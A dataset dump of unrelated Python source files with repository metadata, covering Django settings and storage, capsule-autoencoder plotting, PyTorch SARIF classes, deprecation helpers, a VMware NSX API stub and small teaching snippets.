print(bfs(N))
# print(count)
'''
1. dequeue를 사용했더니 속도가 반 넘게 줄었다..!
2. 속도 관련
- list의 경우 pop(0) 의 경우 => O(N)
- dequeue 의 경우 양방향으로 pop가능. => O(1)
3. pop(0)을 많이 해야하는 경우 dequeue자료구조 활용
4. sys.stdin.readline()속도 줄이기는 입력을 많이 받아야하는 경우에 사용하자.(입력 량 적으면 큰 차이 없음)
'''
| [
"[email protected]"
] | |
0c62175729789e521b514d0ac7abca4b662ba72a | 3c5e4086ff49fb28be692085855c63b624b00d37 | /SuccessiveCommunities_IPAM/commonUsers.py | 63a4f0bf34dfa4d52a609f79cf37b7eff868da7d | [] | no_license | Roja-B/IPAM | bd1a708f053912ce401a99cbe827f2503eae9446 | 5a0e49299abcccda9eb1e7cc523315e6c14d5def | refs/heads/master | 2016-08-08T05:09:02.910761 | 2013-02-06T06:01:11 | 2013-02-06T06:01:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,092 | py |
# Unipartite Projection
# Creates Unipartite graph using Jaccard Index from a bipartite graph
# Input: Bipartite Graph
# Form: "EdgeList"
import sys
from string import lower,upper
from PARAMETERS import *
bgraphname = PATH+"/myResults/20002012/bipartite.txt"
f1 = open(bgraphname,"r")
Participants = dict()
for line in f1:
L1 = line.strip().split("\t")
program = upper(L1[0])
participant = L1[1]
try: Participants[program].add(participant)
except KeyError:
Participants[program] = set()
Participants[program].add(participant)
f1.close()
print "IPAM data has been loaded."
Answer = raw_input('Would you like to see participant overlaps between two programs? Enter y or n: ')
while Answer == 'y':
prog1 = raw_input('Enter first program: ')
prog2 = raw_input('Enter second program: ')
CommonParticipants = set.intersection(Participants[upper(prog1)],Participants[upper(prog2)])
print "People who participated in both programs are as follows:"
print list(CommonParticipants)
Answer = raw_input('Enter y if you want to enter two other programs, otherwise press any key: ')
| [
"[email protected]"
] | |
e6f1aa570bf7102147e51ae3fc964e0a6563e419 | 4dcdc0533b89af0160bb13f729b1fb7be1454e6e | /Topics/Identity testing/Check the truth/main.py | d290b0cff6723c99e75d9e3e98bc17ccd891dc21 | [] | no_license | alendina/Numeric_Matrix | 17227221d27278825868df8d78969ee7b6febca6 | 74b8ff3365eba858b6974f01812bfe2ca041b91c | refs/heads/master | 2023-08-18T06:38:24.145454 | 2021-10-24T18:33:05 | 2021-10-24T18:33:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 145 | py | def check_values(first_value, second_value):
if bool(first_value) and bool(second_value):
return True
else:
return False
| [
"[email protected]"
] | |
8f7d70e38632a557f44e50d6671c469fd196770d | c2d48caa5db7e746a38beca625406fcf47379d3c | /src/olympia/lib/storage.py | 0413ca12fc2c4a45f994579b021cdea728b44eab | [] | permissive | mozilla/addons-server | 1f6269ec0a4aa5a0142a5f81978ef674daf213a7 | e0f043bca8a64478e2ba62f877c9dc28620be22f | refs/heads/master | 2023-09-01T09:34:41.867534 | 2023-09-01T07:21:22 | 2023-09-01T07:21:22 | 16,416,867 | 920 | 590 | BSD-3-Clause | 2023-09-14T16:15:01 | 2014-01-31T18:44:15 | Python | UTF-8 | Python | false | false | 733 | py | from django.contrib.staticfiles.storage import ManifestStaticFilesStorage
class ManifestStaticFilesStorageNotMaps(ManifestStaticFilesStorage):
patterns = (
(
'*.css',
(
# These regexs are copied from HashedFilesMixin in django4.1+
r"""(?P<matched>url\(['"]{0,1}\s*(?P<url>.*?)["']{0,1}\))""",
(
r"""(?P<matched>@import\s*["']\s*(?P<url>.*?)["'])""",
"""@import url("%(url)s")""",
),
# We are ommiting the sourceMappingURL regexs for .css and .js as they
# don't work how we copy over the souces in Makefile-docker.copy_node_js
),
),
)
| [
"[email protected]"
] | |
c923ea98b9bf69a7d382ae175dc5d64d8a9cebb3 | e10a6d844a286db26ef56469e31dc8488a8c6f0e | /stacked_capsule_autoencoders/capsules/plot.py | 433501db8dd6481b815ef5ee817b8978d36d3b7a | [
"Apache-2.0",
"CC-BY-4.0"
] | permissive | Jimmy-INL/google-research | 54ad5551f97977f01297abddbfc8a99a7900b791 | 5573d9c5822f4e866b6692769963ae819cb3f10d | refs/heads/master | 2023-04-07T19:43:54.483068 | 2023-03-24T16:27:28 | 2023-03-24T16:32:17 | 282,682,170 | 1 | 0 | Apache-2.0 | 2020-07-26T15:50:32 | 2020-07-26T15:50:31 | null | UTF-8 | Python | false | false | 10,874 | py | # coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Constellation plotting tools."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
from sklearn.manifold import TSNE
import sonnet as snt
import tensorflow.compat.v1 as tf
import tensorflow_probability as tfp
_COLORS = """
#a6cee3
#1f78b4
#b2df8a
#33a02c
#fb9a99
#e31a1c
#fdbf6f
#ff7f00
#cab2d6
#6a3d9a
#ffff99
#b15928""".split()
def hex_to_rgb(value):
value = value.lstrip('#')
lv = len(value)
return tuple(int(value[i:i + lv // 3], 16) / 255.
for i in range(0, lv, lv // 3))
_COLORS = [c.strip() for c in _COLORS]
_COLORS = _COLORS[1::2] + _COLORS[::2]
_COLORS = np.asarray([hex_to_rgb(c) for c in _COLORS], dtype=np.float32)
def gaussian_blobs(params, height, width, norm='sum'):
"""Creates gaussian blobs on a canvas.
Args:
params: [B, 4] tensor, where entries represent (y, x, y_scale, x_scale).
height: int, height of the output.
width: int, width of the output.
norm: type of normalization to use; must be a postfix of some
tf.reduce_.* method.
Returns:
Tensor of shape [B, height, width].
"""
params = tf.expand_dims(params, -1)
uy, ux, sy, sx = tf.split(params, 4, -2)
rows = tf.range(tf.to_int32(height))
rows = tf.to_float(rows)[tf.newaxis, :, tf.newaxis]
cols = tf.range(tf.to_int32(width))
cols = tf.to_float(cols)[tf.newaxis, tf.newaxis, :]
dy = (rows - uy) / sy
dx = (cols - ux) / sx
z = tf.square(dy) + tf.square(dx)
mask = tf.exp(-.5 * z)
# normalize so that the contribution of each blob sums to one
# change this to `tf.reduce_max` if you want max value to be one
norm_func = getattr(tf, 'reduce_{}'.format(norm))
mask /= norm_func(mask, (1, 2), keep_dims=True) + 1e-8 # pylint:disable=not-callable
return mask
def gaussian_blobs_const_scale(params, scale, height, width, norm='sum'):
scale = tf.zeros_like(params[Ellipsis, :2]) + scale
params = tf.concat([params[Ellipsis, :2], scale], -1)
return gaussian_blobs(params, height, width, norm)
def denormalize_coords(coords, canvas_size, rounded=False):
coords = (coords + 1.) / 2. * np.asarray(canvas_size)[np.newaxis]
if rounded:
coords = tf.round(coords)
return coords
def render_by_scatter(size, points, colors=None, gt_presence=None):
"""Renders point by using tf.scatter_nd."""
if colors is None:
colors = tf.ones(points.shape[:-1].as_list() + [3], dtype=tf.float32)
if gt_presence is not None:
colors *= tf.cast(tf.expand_dims(gt_presence, -1), colors.dtype)
batch_size, n_points = points.shape[:-1].as_list()
shape = [batch_size] + list(size) + [3]
batch_idx = tf.reshape(tf.range(batch_size), [batch_size, 1, 1])
batch_idx = snt.TileByDim([1], [n_points])(batch_idx)
idx = tf.concat([batch_idx, tf.cast(points, tf.int32)], -1)
return tf.scatter_nd(idx, colors, shape)
def render_constellations(pred_points,
capsule_num,
canvas_size,
gt_points=None,
n_caps=2,
gt_presence=None,
pred_presence=None,
caps_presence_prob=None):
"""Renderes predicted and ground-truth points as gaussian blobs.
Args:
pred_points: [B, m, 2].
capsule_num: [B, m] tensor indicating which capsule the corresponding point
comes from. Plots from different capsules are plotted with different
colors. Currently supported values: {0, 1, ..., 11}.
canvas_size: tuple of ints
gt_points: [B, k, 2]; plots ground-truth points if present.
n_caps: integer, number of capsules.
gt_presence: [B, k] binary tensor.
pred_presence: [B, m] binary tensor.
caps_presence_prob: [B, m], a tensor of presence probabilities for caps.
Returns:
[B, *canvas_size] tensor with plotted points
"""
# convert coords to be in [0, side_length]
pred_points = denormalize_coords(pred_points, canvas_size, rounded=True)
# render predicted points
batch_size, n_points = pred_points.shape[:2].as_list()
capsule_num = tf.to_float(tf.one_hot(capsule_num, depth=n_caps))
capsule_num = tf.reshape(capsule_num, [batch_size, n_points, 1, 1, n_caps, 1])
color = tf.convert_to_tensor(_COLORS[:n_caps])
color = tf.reshape(color, [1, 1, 1, 1, n_caps, 3]) * capsule_num
color = tf.reduce_sum(color, -2)
color = tf.squeeze(tf.squeeze(color, 3), 2)
colored = render_by_scatter(canvas_size, pred_points, color, pred_presence)
# Prepare a vertical separator between predicted and gt points.
# Separator is composed of all supported colors and also serves as
# a legend.
# [b, h, w, 3]
n_colors = _COLORS.shape[0]
sep = tf.reshape(tf.convert_to_tensor(_COLORS), [1, 1, n_colors, 3])
n_tiles = int(colored.shape[2]) // n_colors
sep = snt.TileByDim([0, 1, 3], [batch_size, 3, n_tiles])(sep)
sep = tf.reshape(sep, [batch_size, 3, n_tiles * n_colors, 3])
pad = int(colored.shape[2]) - n_colors * n_tiles
pad, r = pad // 2, pad % 2
if caps_presence_prob is not None:
n_caps = int(caps_presence_prob.shape[1])
prob_pads = ([0, 0], [0, n_colors - n_caps])
caps_presence_prob = tf.pad(caps_presence_prob, prob_pads)
zeros = tf.zeros([batch_size, 3, n_colors, n_tiles, 3], dtype=tf.float32)
shape = [batch_size, 1, n_colors, 1, 1]
caps_presence_prob = tf.reshape(caps_presence_prob, shape)
prob_vals = snt.MergeDims(2, 2)(caps_presence_prob + zeros)
sep = tf.concat([sep, tf.ones_like(sep[:, :1]), prob_vals], 1)
sep = tf.pad(sep, [(0, 0), (1, 1), (pad, pad + r), (0, 0)],
constant_values=1.)
# render gt points
if gt_points is not None:
gt_points = denormalize_coords(gt_points, canvas_size, rounded=True)
gt_rendered = render_by_scatter(canvas_size, gt_points, colors=None,
gt_presence=gt_presence)
colored = tf.where(tf.cast(colored, bool), colored, gt_rendered)
colored = tf.concat([gt_rendered, sep, colored], 1)
res = tf.clip_by_value(colored, 0., 1.)
return res
def concat_images(img_list, sep_width, vertical=True):
"""Concatenates image tensors."""
if vertical:
sep = tf.ones_like(img_list[0][:, :sep_width])
else:
sep = tf.ones_like(img_list[0][:, :, :sep_width])
imgs = []
for i in img_list:
imgs.append(i)
imgs.append(sep)
imgs = imgs[:-1]
return tf.concat(imgs, 2 - vertical)
def apply_cmap(brightness, cmap):
indices = tf.cast(brightness * 255.0, tf.int32)
# Make sure the indices are in the right range. Comes in handy for NaN values.
indices = tf.clip_by_value(indices, 0, 256)
cm = matplotlib.cm.get_cmap(cmap)
colors = tf.constant(cm.colors, dtype=tf.float32)
return tf.gather(colors, indices)
def render_activations(activations, height, pixels_per_caps=2, cmap='gray'):
"""Renders capsule activations as a colored grid.
Args:
activations: [B, n_caps] tensor, where every entry is in [0, 1].
height: int, height of the resulting grid.
pixels_per_caps: int, size of a single grid cell.
cmap: string: matplotlib-compatible cmap name.
Returns:
[B, height, width, n_channels] tensor.
"""
# convert activations to colors
if cmap == 'gray':
activations = tf.expand_dims(activations, -1)
else:
activations = apply_cmap(activations, cmap)
batch_size, n_caps, n_channels = activations.shape.as_list()
# pad to fit a grid of prescribed hight
n_rows = 1 + (height - pixels_per_caps) // (pixels_per_caps + 1)
n_cols = n_caps // n_rows + ((n_caps % n_rows) > 0)
n_pads = n_rows * n_cols - n_caps
activations = tf.pad(activations, [(0, 0), (0, n_pads), (0, 0)],
constant_values=1.)
# tile to get appropriate number of pixels to fil a pixel_per_caps^2 square
activations = snt.TileByDim([2], [pixels_per_caps**2])(
tf.expand_dims(activations, 2))
activations = tf.reshape(activations, [batch_size, n_rows, n_cols,
pixels_per_caps, pixels_per_caps,
n_channels])
# pad each cell with one white pixel on the bottom and on the right-hand side
activations = tf.pad(activations, [(0, 0), (0, 0), (0, 0), (0, 1), (0, 1),
(0, 0)], constant_values=1.)
# concat along row and col dimensions
activations = tf.concat(tf.unstack(activations, axis=1), axis=-3)
activations = tf.concat(tf.unstack(activations, axis=1), axis=-2)
# either pad or truncated to get the correct height
if activations.shape[1] < height:
n_pads = height - activations.shape[1]
activations = tf.pad(activations, [(0, 0), (0, n_pads), (0, 0), (0, 0)])
else:
activations = activations[:, :height]
return activations
def correlation(x, y):
"""Computes correlation between x and y.
Args:
x: [B, m],
y: [B, n]
Returns:
corr_xy [m, n]
"""
# [B, m+n]
m = int(x.shape[-1])
xy = tf.concat([x, y], -1)
# [m+n, m+n]
corr = tfp.stats.correlation(xy, sample_axis=0)
corr_xy = corr[:m, m:]
return corr_xy
def make_tsne_plot(caps_presence, labels, filename=None, save_kwargs=None):
"""Makes a TSNE plot."""
# idx = np.random.choice(res.test.posterior_pres.shape[0], size=int(1e4),
# replace=False)
# points = res.train.posterior_pres[idx]
# labels = res.train.label[idx]
tsne = TSNE(2, perplexity=50)
embedded = tsne.fit_transform(caps_presence)
colors = np.asarray([
166, 206, 227,
31, 120, 180,
178, 223, 138,
51, 160, 44,
251, 154, 153,
227, 26, 28,
253, 191, 111,
255, 127, 0,
202, 178, 214,
106, 61, 154
], dtype=np.float32).reshape(10, 3) / 255.
fig, ax = plt.subplots(1, 1, figsize=(6, 6))
for i in range(10):
idx = (labels == i)
points_for_label = embedded[idx]
ax.scatter(points_for_label[:, 0], points_for_label[:, 1], c=colors[i])
if filename is not None:
if save_kwargs is None:
save_kwargs = dict(bbox_inches='tight', dpi=300)
fig.savefig(filename, **save_kwargs)
plt.close(fig)
| [
"[email protected]"
] | |
c46fe73e6b759e76d94ab70e318253601e5e12b7 | 67f19ebb1fb3189e4c2f99484c1dc13af5099edb | /wii_packages/enso/fever/fever_idol7/fever_idol7.py | 9e8af364fb989f103457962cc724befb394fa6d4 | [] | no_license | delguoqing/PyLMPlayer | 609c4fe35e56e4ce3ce30eeb2e9244aad5ea1609 | db8a1edf70ac1c11deffddc458788b3a2c2078df | refs/heads/master | 2021-01-22T05:06:00.491732 | 2013-09-13T04:54:23 | 2013-09-13T04:54:23 | 8,878,510 | 5 | 1 | null | null | null | null | UTF-8 | Python | false | false | 243 | py | def func0(this, _global):
this.stop()
def func1(this, _global):
this.gotoAndPlay("fever")
def func2(this, _global):
this.gotoAndStop(0)
def func3(this, _global):
this.gotoAndPlay("feverWide")
DATA = (
func0,
func1,
func2,
func3,
) | [
"[email protected]"
] | |
9f0d2bf444ffbf8b751a89dbae76aa88747bb009 | e6c7c0fe8ff901b02c02c8cfb342cc2bcd76a8b2 | /lambda_p.py | 0eb68693ab8a4e9920821997994dbc0c829f235e | [] | no_license | VladyslavHnatchenko/theory | d7a3803e7887e60beb2936f24b9eb4056a04a711 | d2a18d577c046b896fcab86684d9011db1d4867d | refs/heads/master | 2020-04-08T10:42:55.198754 | 2018-12-25T06:00:17 | 2018-12-25T06:00:17 | 159,279,432 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,550 | py | def multiply_all(numbers):
product = 1
for n in numbers:
product *= n
return product
numbers = [2, 1, 3, 4, 7, 11, 18]
product = multiply_all(numbers)
print(product)
# from functools import reduce
#
#
# numbers = [2, 1, 3, 4, 7, 11, 18]
# product = reduce(lambda x, y: x * y, numbers, 1)
#
# print(product)
# numbers = [2, 1, 3, 4, 7, 11, 18]
# squared_numbers = (n**2 for n in numbers)
# odd_numbers = (n for n in numbers if n % 2 == 1)
# print(odd_numbers)
# print(squared_numbers)
# print(numbers)
# numbers = [2, 1, 3, 4, 7, 11, 18]
# squared_numbers = map(lambda n: n**2, numbers)
# odd_numbers = filter(lambda n: n % 2 == 1, numbers)
# print(squared_numbers)
# print(odd_numbers)
# print(numbers)
# def color_of_point(point):
# (x, y), color = point
# return color
#
#
# points = [((1, 2), 'red'), ((3, 4), 'green')]
# points_by_color = sorted(points, key=color_of_point)
# print(points_by_color)
# def length_and_alphabetical(string):
# return len(string), string.casefold()
#
#
# colors = (["Goldenrod", "Purple", "Salmon", "Turquoise", "Cyan"])
# colors_by_length = sorted(colors, key=length_and_alphabetical)
# print(colors_by_length)
# colors = (["Goldenrod", "Purple", "Salmon", "Turquoise", "Cyan"])
# print(sorted(colors, key=lambda s: s.casefold()))
# normalized_colors = map(lambda s: s.casefold(), colors)
# colors = ["Goldenrod", "Purple", "Salmon", "Turquoise", "Cyan"]
#
#
# def normalize_case(string):
# return string.casefold()
#
#
# normalized_colors = map(normalize_case, colors)
| [
"[email protected]"
] | |
712c35310d6dded71e8bb56fe425b5331e450d82 | 7fa08c93ff0caa4c86d4fa1727643331e081c0d0 | /brigid_api_client/models/aws_accounts_retrieve_expand.py | affdf90386d13f2fa7f0cb41d10e07e378faf6b2 | [
"LicenseRef-scancode-warranty-disclaimer",
"MIT"
] | permissive | caltechads/brigid-api-client | 760768c05280a4fb2f485e27c05f6ae24fbb7c6f | 3e885ac9e7b3c00b8a9e0cc1fb7b53b468d9e10a | refs/heads/master | 2023-03-23T03:11:02.446720 | 2021-03-13T00:47:03 | 2021-03-13T00:47:03 | 338,424,261 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 263 | py | from enum import Enum
class AwsAccountsRetrieveExpand(str, Enum):
AWSACCOUNTAWS_VPCS = "awsaccount.aws_vpcs"
AWSACCOUNTCONTACTS = "awsaccount.contacts"
AWSACCOUNTTEAM = "awsaccount.team"
def __str__(self) -> str:
return str(self.value)
| [
"[email protected]"
] | |
d9400873abaf5962c7e4757d1c542489ceeebce1 | 360a83e36c064d37c0ceeded47edb257157c0702 | /django_cadastro/urls.py | 63e3f9aaf041bf0b1c2752e84429e7806f0f275d | [] | no_license | rafa-souza-dev/django_cadastros | 164ffc1f0000a311ae73d704bde4fe748dd7adf4 | ea0f84198a455e06c9476de0309da91f51cd700d | refs/heads/master | 2023-03-29T07:51:20.740625 | 2021-04-01T19:43:38 | 2021-04-01T19:43:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 829 | py | """django_cadastro URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from django.urls import include
urlpatterns = [
path('admin/', admin.site.urls),
path('', include('cadastro.urls'))
]
| [
"[email protected]"
] | |
7ce76357c170555ecbb807b767bd856eaf8da2cc | afd2087e80478010d9df66e78280f75e1ff17d45 | /torch/onnx/_internal/diagnostics/infra/sarif/_fix.py | 5e3b944aa23983b9fbaa1e7015921124ae0f7c75 | [
"BSD-3-Clause",
"BSD-2-Clause",
"LicenseRef-scancode-secret-labs-2011",
"LicenseRef-scancode-generic-cla",
"BSL-1.0",
"Apache-2.0"
] | permissive | pytorch/pytorch | 7521ac50c47d18b916ae47a6592c4646c2cb69b5 | a6f7dd4707ac116c0f5fb5f44f42429f38d23ab4 | refs/heads/main | 2023-08-03T05:05:02.822937 | 2023-08-03T00:40:33 | 2023-08-03T04:14:52 | 65,600,975 | 77,092 | 24,610 | NOASSERTION | 2023-09-14T21:58:39 | 2016-08-13T05:26:41 | Python | UTF-8 | Python | false | false | 1,069 | py | # DO NOT EDIT! This file was generated by jschema_to_python version 0.0.1.dev29,
# with extension for dataclasses and type annotation.
from __future__ import annotations
import dataclasses
from typing import List, Optional
from torch.onnx._internal.diagnostics.infra.sarif import (
_artifact_change,
_message,
_property_bag,
)
@dataclasses.dataclass
class Fix(object):
"""A proposed fix for the problem represented by a result object. A fix specifies a set of artifacts to modify. For each artifact, it specifies a set of bytes to remove, and provides a set of new bytes to replace them."""
artifact_changes: List[_artifact_change.ArtifactChange] = dataclasses.field(
metadata={"schema_property_name": "artifactChanges"}
)
description: Optional[_message.Message] = dataclasses.field(
default=None, metadata={"schema_property_name": "description"}
)
properties: Optional[_property_bag.PropertyBag] = dataclasses.field(
default=None, metadata={"schema_property_name": "properties"}
)
# flake8: noqa
| [
"[email protected]"
] | |
e7d7c4854b2c5775a583cb11250ffe5044996f9e | ac235a23f22be0d6f1818bb53902177f9969813a | /ddtrace/vendor/debtcollector/moves.py | 8fac7543ff67b6e20f85f3795013883d832dc1b4 | [
"Apache-2.0",
"BSD-3-Clause"
] | permissive | DataDog/dd-trace-py | f09d6d48c4c69aea68f999fc8a458ade5c6150cf | 1e3bd6d4edef5cda5a0831a6a7ec8e4046659d17 | refs/heads/1.x | 2023-09-01T20:25:26.746324 | 2023-09-01T18:54:37 | 2023-09-01T18:54:37 | 61,572,326 | 461 | 426 | NOASSERTION | 2023-09-14T20:38:57 | 2016-06-20T18:52:23 | Python | UTF-8 | Python | false | false | 8,421 | py | # -*- coding: utf-8 -*-
# Copyright (C) 2015 Yahoo! Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import inspect
import six
from .. import wrapt
from . import _utils
_KIND_MOVED_PREFIX_TPL = "%s '%s' has moved to '%s'"
_CLASS_MOVED_PREFIX_TPL = "Class '%s' has moved to '%s'"
_MOVED_CALLABLE_POSTFIX = "()"
_FUNC_MOVED_PREFIX_TPL = "Function '%s' has moved to '%s'"
def _moved_decorator(kind, new_attribute_name, message=None,
version=None, removal_version=None, stacklevel=3,
attr_postfix=None, category=None):
"""Decorates a method/property that was moved to another location."""
def decorator(f):
fully_qualified, old_attribute_name = _utils.get_qualified_name(f)
if attr_postfix:
old_attribute_name += attr_postfix
@wrapt.decorator
def wrapper(wrapped, instance, args, kwargs):
base_name = _utils.get_class_name(wrapped, fully_qualified=False)
if fully_qualified:
old_name = old_attribute_name
else:
old_name = ".".join((base_name, old_attribute_name))
new_name = ".".join((base_name, new_attribute_name))
prefix = _KIND_MOVED_PREFIX_TPL % (kind, old_name, new_name)
out_message = _utils.generate_message(
prefix, message=message,
version=version, removal_version=removal_version)
_utils.deprecation(out_message, stacklevel=stacklevel,
category=category)
return wrapped(*args, **kwargs)
return wrapper(f)
return decorator
def moved_function(new_func, old_func_name, old_module_name,
message=None, version=None, removal_version=None,
stacklevel=3, category=None):
"""Deprecates a function that was moved to another location.
This generates a wrapper around ``new_func`` that will emit a deprecation
warning when called. The warning message will include the new location
to obtain the function from.
"""
new_func_full_name = _utils.get_callable_name(new_func)
new_func_full_name += _MOVED_CALLABLE_POSTFIX
old_func_full_name = ".".join([old_module_name, old_func_name])
old_func_full_name += _MOVED_CALLABLE_POSTFIX
prefix = _FUNC_MOVED_PREFIX_TPL % (old_func_full_name, new_func_full_name)
out_message = _utils.generate_message(prefix,
message=message, version=version,
removal_version=removal_version)
@six.wraps(new_func, assigned=_utils.get_assigned(new_func))
def old_new_func(*args, **kwargs):
_utils.deprecation(out_message, stacklevel=stacklevel,
category=category)
return new_func(*args, **kwargs)
old_new_func.__name__ = old_func_name
old_new_func.__module__ = old_module_name
return old_new_func
class moved_read_only_property(object):
"""Descriptor for read-only properties moved to another location.
This works like the ``@property`` descriptor but can be used instead to
provide the same functionality and also interact with the :mod:`warnings`
module to warn when a property is accessed, so that users of those
properties can know that a previously read-only property at a prior
location/name has moved to another location/name.
:param old_name: old attribute location/name
:param new_name: new attribute location/name
:param version: version string (represents the version this deprecation
was created in)
:param removal_version: version string (represents the version this
deprecation will be removed in); a string
of '?' will denote this will be removed in
some future unknown version
:param stacklevel: stacklevel used in the :func:`warnings.warn` function
to locate where the users code is when reporting the
deprecation call (the default being 3)
:param category: the :mod:`warnings` category to use, defaults to
:py:class:`DeprecationWarning` if not provided
"""
def __init__(self, old_name, new_name,
version=None, removal_version=None,
stacklevel=3, category=None):
self._old_name = old_name
self._new_name = new_name
self._message = _utils.generate_message(
"Read-only property '%s' has moved"
" to '%s'" % (self._old_name, self._new_name),
version=version, removal_version=removal_version)
self._stacklevel = stacklevel
self._category = category
def __get__(self, instance, owner):
_utils.deprecation(self._message,
stacklevel=self._stacklevel,
category=self._category)
# This handles the descriptor being applied on a
# instance or a class and makes both work correctly...
if instance is not None:
real_owner = instance
else:
real_owner = owner
return getattr(real_owner, self._new_name)
def moved_method(new_method_name, message=None,
version=None, removal_version=None, stacklevel=3,
category=None):
"""Decorates an *instance* method that was moved to another location."""
if not new_method_name.endswith(_MOVED_CALLABLE_POSTFIX):
new_method_name += _MOVED_CALLABLE_POSTFIX
return _moved_decorator('Method', new_method_name, message=message,
version=version, removal_version=removal_version,
stacklevel=stacklevel,
attr_postfix=_MOVED_CALLABLE_POSTFIX,
category=category)
def moved_property(new_attribute_name, message=None,
version=None, removal_version=None, stacklevel=3,
category=None):
"""Decorates an *instance* property that was moved to another location."""
return _moved_decorator('Property', new_attribute_name, message=message,
version=version, removal_version=removal_version,
stacklevel=stacklevel, category=category)
def moved_class(new_class, old_class_name, old_module_name,
message=None, version=None, removal_version=None,
stacklevel=3, category=None):
"""Deprecates a class that was moved to another location.
This creates a 'new-old' type that can be used for a
deprecation period that can be inherited from. This will emit warnings
when the old locations class is initialized, telling where the new and
improved location for the old class now is.
"""
if not inspect.isclass(new_class):
_qual, type_name = _utils.get_qualified_name(type(new_class))
raise TypeError("Unexpected class type '%s' (expected"
" class type only)" % type_name)
old_name = ".".join((old_module_name, old_class_name))
new_name = _utils.get_class_name(new_class)
prefix = _CLASS_MOVED_PREFIX_TPL % (old_name, new_name)
out_message = _utils.generate_message(
prefix, message=message, version=version,
removal_version=removal_version)
def decorator(f):
@six.wraps(f, assigned=_utils.get_assigned(f))
def wrapper(self, *args, **kwargs):
_utils.deprecation(out_message, stacklevel=stacklevel,
category=category)
return f(self, *args, **kwargs)
return wrapper
old_class = type(old_class_name, (new_class,), {})
old_class.__module__ = old_module_name
old_class.__init__ = decorator(old_class.__init__)
return old_class
| [
"[email protected]"
] | |
e115e1d148d03af970ec8a9f6f8a834f3d8cbf5b | 9610621437f025aa97f99b67f0a5d8e13bbb715c | /com/vmware/nsx_policy/infra/tier_0s/locale_services/l2vpn_context/l2vpns_client.py | 37e0e1746854f7e9d4a3f17ef29d108a076bcd0d | [
"MIT"
] | permissive | adammillerio/vsphere-automation-sdk-python | 2b3b730db7da99f1313c26dc738b82966ecea6ce | c07e1be98615201139b26c28db3aa584c4254b66 | refs/heads/master | 2022-11-20T03:09:59.895841 | 2020-07-17T19:32:37 | 2020-07-17T19:32:37 | 280,499,136 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,908 | py | # -*- coding: utf-8 -*-
#---------------------------------------------------------------------------
# Copyright 2020 VMware, Inc. All rights reserved.
# AUTO GENERATED FILE -- DO NOT MODIFY!
#
# vAPI stub file for package com.vmware.nsx_policy.infra.tier_0s.locale_services.l2vpn_context.l2vpns.
#---------------------------------------------------------------------------
"""
"""
__author__ = 'VMware, Inc.'
__docformat__ = 'restructuredtext en'
import sys
from vmware.vapi.bindings import type
from vmware.vapi.bindings.converter import TypeConverter
from vmware.vapi.bindings.enum import Enum
from vmware.vapi.bindings.error import VapiError
from vmware.vapi.bindings.struct import VapiStruct
from vmware.vapi.bindings.stub import (
ApiInterfaceStub, StubFactoryBase, VapiInterface)
from vmware.vapi.bindings.common import raise_core_exception
from vmware.vapi.data.validator import (UnionValidator, HasFieldsOfValidator)
from vmware.vapi.exception import CoreException
from vmware.vapi.lib.constants import TaskType
from vmware.vapi.lib.rest import OperationRestMetadata
class PeerConfig(VapiInterface):
"""
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx_policy.infra.tier_0s.locale_services.l2vpn_context.l2vpns.peer_config'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _PeerConfigStub)
self._VAPI_OPERATION_IDS = {}
def get(self,
tier0_id,
locale_service_id,
l2vpn_id,
enforcement_point_path=None,
):
"""
:type tier0_id: :class:`str`
:param tier0_id: (required)
:type locale_service_id: :class:`str`
:param locale_service_id: (required)
:type l2vpn_id: :class:`str`
:param l2vpn_id: (required)
:type enforcement_point_path: :class:`str` or ``None``
:param enforcement_point_path: String Path of the enforcement point (optional)
:rtype: :class:`com.vmware.nsx_policy.model_client.AggregateL2VpnPeerConfig`
:return: com.vmware.nsx_policy.model.AggregateL2VpnPeerConfig
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('get',
{
'tier0_id': tier0_id,
'locale_service_id': locale_service_id,
'l2vpn_id': l2vpn_id,
'enforcement_point_path': enforcement_point_path,
})
class Statistics(VapiInterface):
"""
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx_policy.infra.tier_0s.locale_services.l2vpn_context.l2vpns.statistics'
"""
Identifier of the service in canonical form.
"""
